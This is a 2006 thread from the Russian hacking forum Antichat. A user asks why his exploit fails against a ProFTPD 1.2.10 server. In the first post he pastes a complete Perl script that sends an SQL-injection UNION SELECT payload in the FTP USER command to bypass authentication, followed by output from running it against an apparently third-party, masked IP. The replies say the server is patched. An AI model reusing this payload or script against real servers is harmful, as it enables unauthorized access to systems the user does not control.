ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Что я делаю не так?
  #1  
Старый 03.04.2006, 12:22
Аватар для ProblemaT2
ProblemaT2
Новичок
Регистрация: 31.03.2006
Сообщений: 23
Провел на форуме:
82526

Репутация: 2
По умолчанию Что я делаю не так?

Неавторизованный доступ ProFTPD 1.2.*

Вот сплойт:
Код HTML:
#!/usr/bin/perl
# Origin: runlevel [ runlevel@raregazz.org ] Spain, 2003
# Updated by Sawasoft and Dr. Trunk Latvia, 2003
# Working source! Have fun, scriptkiddiez!

     use IO::Socket;
if(@ARGV<2)
{
#     print "\nProof Of Concept Sql Inject on ProFTPD\n";
#     print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
        print "DZJAAAAAAAA \n\n\n";
#     exit(0);
};

$server = $ARGV[0];
$query = $ARGV[1];
$remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
or die "Can't connect. \n";

if(defined($line=<$remote>))
{
     print STDOUT $line;
if($query eq "1")
{
     print $remote "USER ')UNION SELECT'u','p',1001,1001,'/tmp','/bin/bash'WHERE(''='\n";
}
else
{
     print $remote "USER ')UNION SELECT'u','p',1001,1001,'/bin/bash' WHERE(''='\n";
};

if(defined($line=<$remote>))
{
     print STDOUT $line;
     print $remote "PASS p\n";

if(defined($line=<$remote>))
{
     print STDOUT $line;
     print "Sent query to $ARGV[0]\n";

if($line =~ /230/)
{
     print "[------- Sql Inject Able \n";
}
else
{
     print "[------- Sql Inject Unable \n";
};
};
};
};

close $remote;
C:\Perl\bin>perl C:\Perl\ftp.pl ***.**.**.**
DZJAAAAAAAA


220 ProFTPD 1.2.10 Server (ProFTPD) [***.**.**.**]
331 Password required for ')UNION.
530 Login incorrect.
Sent query to ***.**.**.**
[------- Sql Inject Unable

Вот что получаеться

Последний раз редактировалось ProblemaT2; 03.04.2006 в 12:30..
 
Ответить с цитированием

  #2  
Старый 03.04.2006, 12:49
Аватар для Deem3n®
Deem3n®
Постоянный
Регистрация: 19.09.2005
Сообщений: 408
Провел на форуме:
3730496

Репутация: 519
По умолчанию

чего непонятного?
Sql Inject Unable
 
Ответить с цитированием

  #3  
Старый 03.04.2006, 12:51
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

а ЕСЛИ ПО РУССКИ ТО БАГИ ТАМ НЕТУ! И ОН ТЕБЯ ПОСЫЛАЕТ!!!
 
Ответить с цитированием

  #4  
Старый 03.04.2006, 12:54
Аватар для Mobile
Mobile
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333

Репутация: 1564


Отправить сообщение для Mobile с помощью ICQ
По умолчанию

Тема названа туповато...
 
Ответить с цитированием

  #5  
Старый 03.04.2006, 12:57
Аватар для ProblemaT2
ProblemaT2
Новичок
Регистрация: 31.03.2006
Сообщений: 23
Провел на форуме:
82526

Репутация: 2
По умолчанию

Всё понятно.

Просто версия на серваке ProFTPD 1.2.10, по идее уязвимая вот я иподумал что чото не так делаю...
Ещё вот это смущает
Код HTML:
530 Login incorrect

Последний раз редактировалось ProblemaT2; 03.04.2006 в 12:59..
 
Ответить с цитированием

  #6  
Старый 03.04.2006, 12:59
Аватар для limpompo
limpompo
Друг Клитора
Регистрация: 27.08.2005
Сообщений: 1,662
Провел на форуме:
6913553

Репутация: 1329


По умолчанию

гы значит пропатчена!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Открытое письмо журналу "Хакер" TheFile Болталка 34 31.01.2009 21:03
Наша служба и опасна и трудна) Copyright_2000 Болталка 10 28.05.2008 19:20
Майкл Делл novichok Чужие Статьи 0 29.03.2006 21:51
Прикольные загадки!!! Hitman_2 Болталка 0 19.03.2006 01:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ